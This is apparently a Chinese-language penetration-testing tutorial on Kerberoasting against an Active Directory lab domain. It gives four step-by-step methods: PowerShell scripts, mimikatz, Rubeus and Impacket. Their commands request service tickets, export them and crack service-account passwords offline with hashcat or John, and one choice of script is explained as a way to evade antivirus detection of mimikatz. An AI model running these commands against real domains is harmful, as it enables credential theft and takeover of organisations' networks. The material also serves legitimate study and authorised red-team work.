kerberos认证#

攻击发送在TGS认证的阶段，首先我们要知道这个攻击只要在域用户的权限下都可以发送TGS请求。

SPN介绍#

服务主体名称（SPN：ServicePrincipal Names）是服务实例（可以理解为一个服务，比如 HTTP、MSSQL）的唯一标识符。Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。如果在整个林或域中的计算机上安装多个服务实例，则每个实例都必须具有自己的 SPN。如果客户端可能使用多个名称进行身份验证，则给定服务实例可以具有多个 SPN。SPN 始终包含运行服务实例的主机的名称，因此服务实例可以为其主机的每个名称或别名注册 SPN。

当某用户需要访问MySQL服务时，系统会以当前用户的身份向域控查询SPN为MySQL的记录。当找到该SPN记录后，用户会再次与KDC通信，将KDC发放的TGT作为身份凭据发送给客户，并将需要访问的SPN发送给KDC。

KDC中的TGS服务对TGT进行解密。确认无误后，由TGS将一张允许访问该SPN所对应的服务的ST服务票据和该SPN所对应的服务的地址发送给用户，用户使用该票据即可访问MySQL服务。

相关详细的文章可以查看另外一遍文章域渗透-SPN

攻击原理#

1. 攻击者对一个域进行身份验证，然后从域控制器获得一个TGT认购权证，该TGT认购权证用于以后的ST服务票据请求。
2. 攻击者使用他们的 TGT认购权证 发出ST服务票据请求(TGS-REQ) 获取特定标识的SPN。此SPN在域中应该是唯一的，并且在用户或计算机帐户的servicePrincipalName 字段中注册。在服务票证请求(TGS-REQ)过程中，攻击者可以指定它们支持的Kerberos加密类型(RC4_HMAC，AES256_CTS_HMAC_SHA1_96等等)。
3. 如果攻击者的 TGT 是有效的，则 DC 将从TGT认购权证中提取信息并填充到ST服务票据中。然后，域控制器查找哪个帐户在ServicedPrincipalName 字段中注册了所请求的 SPN。ST服务票据使用注册了所要求的 SPN 的帐户的NTLM哈希进行加密,并使用攻击者和服务帐户共同商定的加密算法。ST服务票据以服务票据回复(TGS-REP)的形式发送回攻击者。
4. 攻击者从 TGS-REP 中提取加密的服务票证。由于服务票证是用链接到请求 SPN 的帐户的哈希加密的，所以攻击者可以离线破解这个加密块，恢复帐户的明文密码。

环境#

方法一（PS脚本）#

首先是在主机WIN7A上面的普通域用户进行操作，使用powershell进行操作，下面是请求SPN中所有的TGS：

Add-Type -AssemblyName System.IdentityModel
setspn.exe -q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

如下图：

如果想请求单个服务可以用下面的命令：

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL.hack.lab:1433"

Kerberos 协议中请求的票据会保存在内存中，可以通过 klist 命令查看当前会话存储的 kerberos 票据:

接着我们使用RiskySPN工具包中的Get-TGSCipher.ps1脚本来进行导出：

Import-Module .\Get-TGSCipher.ps1
Get-TGSCipher -SPN "MSSQLSvc/SQL.hack.lab:1433" -Format Hashcat

如果想要用John，改成-Format John即可

如下图所示：

然后把这串字符放到hashcat进行破解就完事了：

hashcat -m 13100 hash.txt passwd.txt

因为要做mimikatz的免杀，我们可以使用powershell的脚本，这是来自于Empire框架中的Invoke-Kerberoast.ps1。

Import-Module .\Invoke-kerberoast.ps1
Invoke-kerberoast -OutputFormat Hashcat

结果如下图：

同上放到hashcat破解即可。

方法二（mimikatz）#

除了可以使用powershell脚本，也可以使用大杀器mimikatz。

首先还是先请求spn，把所有服务的TGS都存储到内存中：

Add-Type -AssemblyName System.IdentityModel
setspn.exe -q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

接着可使用mimikatz导出票据(不需要系统权限)：

kerberos::list /export

如下图：

接着把票据拿到kerberoast工具包中的tgsrepcrack.py破解：

python3 tgsrepcrack.py  passwordlist.txt 2-40a50000-lucky@MSSQLSvc\~SQL.hack.lab\~1433-HACK.LAB.kirbi

结果如下图：

也可以把票据转换成John的格式进行破解：

python3 kirbi2john.py 2-40a50000-lucky@MSSQLSvc\~SQL.hack.lab\~1433-HACK.LAB.kirbi > kirbihash
john --wordlist passwordlist.txt kirbihash

方法三（Rubeus）#

这款工具我们有在另外一篇域渗透-AS_REPRoasting讲过，当然它也可以用来做Kerberoasting攻击。

直接运行：

./Rubeus.exe kerberoast /outfile:hash.txt

会输出hashcat的破解格式文本：

还是用hashcat破解：

hashcat -m 13100 hash.txt passwd.txt

方法四（Impacket）#

使用 Impacket 工具包中的 模块GetUSerSPNs.py可以进行远程攻击，需要获取到域用户的密码或者是NTLM。

命令如下：

GetUserSPNs.py hack.lab/lucky:p@ssw0rd -dc-ip 172.16.0.106 -request

-dc-ip 后面接的是DC的IP，-request是输出结果。

使用NTLM可以使用参数-hashes，使用aeseky可以使用参数-aesKey

-outputfile可以输出为文件

结果如下图：

把内容拿到hashcat爆破即可。

如果遇到下面的报错问题：

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

原因是没有同步dc上面的时间，可以使用下面的命令进行同步：

sudo apt install ntpdate
sudo ntpdate 172.16.0.106